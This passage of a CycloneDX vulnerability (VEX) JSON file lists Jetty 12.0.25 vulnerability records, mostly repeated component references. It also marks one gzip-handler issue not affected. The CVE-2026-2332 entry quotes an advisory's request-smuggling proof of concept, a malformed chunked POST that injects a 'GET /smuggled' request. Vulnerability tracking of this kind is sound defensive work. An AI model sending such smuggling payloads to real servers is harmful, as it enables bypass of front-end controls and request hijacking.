"urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#07983817-5fbc-4a39-aba1-139a1ac2292f" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1b68584e-0797-44ab-bb19-aa50af4c81d2" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d2ec2826-78ec-4c56-a564-c63b053a699d/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:07dd3b3b-2b52-47fc-9b7a-b9d0cbf3ed33/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#48a2f8c6-8d40-4902-95dd-96bf4369d997" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#31016da4-89e9-4ba6-a9bf-a81b65de515b" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#6ecc49f0-86a1-43e3-b91b-9991b2062973" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#4eb3da37-f349-4d9c-bee1-31b8405fde56" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.eclipse.jetty/jetty-server@12.0.25" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#1f8cbb6f-c8a2-492a-b9b5-0e812a4bc437" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#40fdcade-b309-4969-927e-54444d8b93ba" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4a82328d-5079-4ee9-99da-633547280320" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "The gzip handler is used uniformly, and the prerequisites for the exploitation are not met." } }, { "id": "CVE-2026-2332", "source": { "name": "ghsa", "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven" }, "ratings": [ { "source": { "name": "ghsa" }, "score": 7.4, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 9.1, "severity": "critical", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 7.4, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], "cwes": [ 444 ], "description": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at\u00a0\\r\\n\u00a0inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.", "recommendation": "Upgrade org.eclipse.jetty:jetty-http to version 12.1.7, 12.0.33, 11.0.28, 10.0.28, 9.4.60", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-2332" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-2332" }, { "url": "https://github.com/jetty/jetty.project" }, { "url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf" }, { "url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/89" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2332" }, { "url": "https://w4ke.info/2025/06/18/funky-chunks.html" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-2332" } ], "published": "2026-04-14T12:16:21+00:00", "updated": "2026-05-01T13:31:00+00:00", "affects": [ { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "pkg:maven/org.eclipse.jetty/jetty-http@12.0.25", "versions": [ { "version": "12.0.25", "status": "affected" } ] }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#1edb018d-a2a4-42d7-bd98-26ff4c1eebaa" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#070b900b-71e6-44bd-a62d-8c77ef4e02c9" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:40f481a1-05ad-42d9-bc87-35853821083f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:dab14c2a-4bad-4686-8d63-e41f17d16828/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#5403c917-cdc9-4d7b-9db6-ba5dcea8c57e" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#cdf7aedb-2946-46f1-9ec5-259b4e6d6ce4" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8cf291f3-05bb-4e0b-a249-a73e0b463443/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:2a312645-fb3d-4dcf-be6b-1432511b1648/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:5096b213-a837-458f-a78b-26c07c86ed20/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:3e924595-06db-4218-b256-abeb1a7d8834/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:09d804de-d5c5-4d02-90a1-7d8abeb32523/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:8342b19d-38af-4e7e-9c49-2fb5f7c32324/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:7e21f33a-3847-47ee-ae0b-7461eb412c56/1#166b2bda-2452-4bf5-a916-74c303005132" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:9fa01ca3-7e73-483f-9720-339201fc0998/1#8048485e-4da2-4f5e-8989-37771b16ef37" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.eclipse.jetty/jetty-http@12.0.25" }, { "ref": 